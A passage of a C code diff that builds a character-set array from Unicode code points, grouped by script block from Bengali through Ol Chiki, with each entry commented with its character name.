+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
+	c = 0x1880;		// from MONGOLIAN LETTER ALI GALI ANUSVARA ONE
+	while (c <= 0x18aa)	// ..to MONGOLIAN LETTER MANCHU ALI GALI LHA
+		charset[i++] = c++;
+// 18B0..18FF; Unified Canadian Aboriginal Syllabics Extended
+	c = 0x18b0;		// from CANADIAN SYLLABICS OY
+	while (c <= 0x18f5)	// ..to CANADIAN SYLLABICS CARRIER DENTAL S
+		charset[i++] = c++;
+// 1900..194F; Limbu
+	c = 0x1900;		// from LIMBU VOWEL-CARRIER LETTER
+	while (c <= 0x191e)	// ..to LIMBU LETTER TRA
+		charset[i++] = c++;
+	c = 0x1920;		// from LIMBU VOWEL SIGN A
+	while (c <= 0x192b)	// ..to LIMBU SUBJOINED LETTER WA
+		charset[i++] = c++;
+	c = 0x1930;		// from LIMBU SMALL LETTER KA
+	while (c <= 0x193b)	// ..to LIMBU SIGN SA-I
+		charset[i++] = c++;
+	c = 0x1944;		// from LIMBU EXCLAMATION MARK
+	while (c <= 0x194f)	// ..to LIMBU DIGIT NINE
+		charset[i++] = c++;
+// 1950..197F; Tai Le
+	c = 0x1950;		// from TAI LE LETTER KA
+	while (c <= 0x196d)	// ..to TAI LE LETTER AI
+		charset[i++] = c++;
+	c = 0x1970;		// from TAI LE LETTER TONE-2
+	while (c <= 0x1974)	// ..to TAI LE LETTER TONE-6
+		charset[i++] = c++;
+// 1980..19DF; New Tai Lue
+	c = 0x1980;		// from NEW TAI LUE LETTER HIGH QA
+	while (c <= 0x19ab)	// ..to NEW TAI LUE LETTER LOW SUA
+		charset[i++] = c++;
+	c = 0x19b0;		// from NEW TAI LUE VOWEL SIGN VOWEL SHORTENER
+	while (c <= 0x19c9)	// ..to NEW TAI LUE TONE MARK-2
+		charset[i++] = c++;
+	c = 0x19d0;		// from NEW TAI LUE DIGIT ZERO
+	while (c <= 0x19da)	// ..to NEW TAI LUE THAM DIGIT ONE
+		charset[i++] = c++;
+	charset[i++] = 0x19de;	// NEW TAI LUE SIGN LAE
+	charset[i++] = 0x19df;	// NEW TAI LUE SIGN LAEV
+// 19E0..19FF; Khmer Symbols
+	c = 0x19e0;		// from KHMER SYMBOL PATHAMASAT
+	while (c <= 0x19ff)	// ..to KHMER SYMBOL DAP-PRAM ROC
+		charset[i++] = c++;
+// 1A00..1A1F; Buginese
+	c = 0x1a00;		// from BUGINESE LETTER KA
+	while (c <= 0x1a1b)	// ..to BUGINESE VOWEL SIGN AE
+		charset[i++] = c++;
+	charset[i++] = 0x1a1e;	// BUGINESE PALLAWA
+	charset[i++] = 0x1a1f;	// BUGINESE END OF SECTION
+// 1A20..1AAF; Tai Tham
+	c = 0x1a20;		// from TAI THAM LETTER HIGH KA
+	while (c <= 0x1a5e)	// ..to TAI THAM CONSONANT SIGN SA
+		charset[i++] = c++;
+	c = 0x1a60;		// from TAI THAM SIGN SAKOT
+	while (c <= 0x1a7c)	// ..to TAI THAM SIGN KHUEN-LUE KARAN
+		charset[i++] = c++;
+	c = 0x1a7f;		// from TAI THAM COMBINING CRYPTOGRAMMIC DOT
+	while (c <= 0x1a89)	// ..to TAI THAM HORA DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1a90;		// from TAI THAM THAM DIGIT ZERO
+	while (c <= 0x1a99)	// ..to TAI THAM THAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1aa0;		// from TAI THAM SIGN WIANG
+	while (c <= 0x1aad)	// ..to TAI THAM SIGN CAANG
+		charset[i++] = c++;
+// 1AB0..1AFF; Combining Diacritical Marks Extended
+	c = 0x1ab0;		// from COMBINING DOUBLED CIRCUMFLEX ACCENT
+	while (c <= 0x1abe)	// ..to COMBINING PARENTHESES OVERLAY
+		charset[i++] = c++;
+// 1B00..1B7F; Balinese
+	c = 0x1b00;		// from BALINESE SIGN ULU RICEM
+	while (c <= 0x1b4b)	// ..to BALINESE LETTER ASYURA SASAK
+		charset[i++] = c++;
+	c = 0x1b50;		// from BALINESE DIGIT ZERO
+	while (c <= 0x1b7c)	// ..to BALINESE MUSICAL SYMBOL LEFT-HAND OPEN PING
+		charset[i++] = c++;
+// 1B80..1BBF; Sundanese
+	c = 0x1b80;		// from SUNDANESE SIGN PANYECEK
+	while (c <= 0x1bbf)	// ..to SUNDANESE LETTER FINAL M
+		charset[i++] = c++;
+// 1BC0..1BFF; Batak
+	c = 0x1bc0;		// from BATAK LETTER A
+	while (c <= 0x1bf3)	// ..to BATAK PANONGONAN
+		charset[i++] = c++;
+	c = 0x1bfc;		// from BATAK SYMBOL BINDU NA METEK
+	while (c <= 0x1bff)	// ..to BATAK SYMBOL BINDU PANGOLAT
+		charset[i++] = c++;
+// 1C00..1C4F; Lepcha
+	c = 0x1c00;		// from LEPCHA LETTER KA
+	while (c <= 0x1c37)	// ..to LEPCHA SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x1c3b;		// from LEPCHA PUNCTUATION TA-ROL
+	while (c <= 0x1c49)	// ..to LEPCHA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1c4d;	// LEPCHA LETTER TTA
+	charset[i++] = 0x1c4f;	// LEPCHA LETTER DDA
+// 1C50..1C7F; Ol Chiki
+	c = 0x1c50;		// from OL CHIKI DIGIT ZERO
+	while (c <= 0x1c7f)	// ..to OL CHIKI PUNCTUATION DOUBLE MUCAAD
+		charset[i++] = c++;
+// 1C80..1C8F; Cyrillic Extended-C
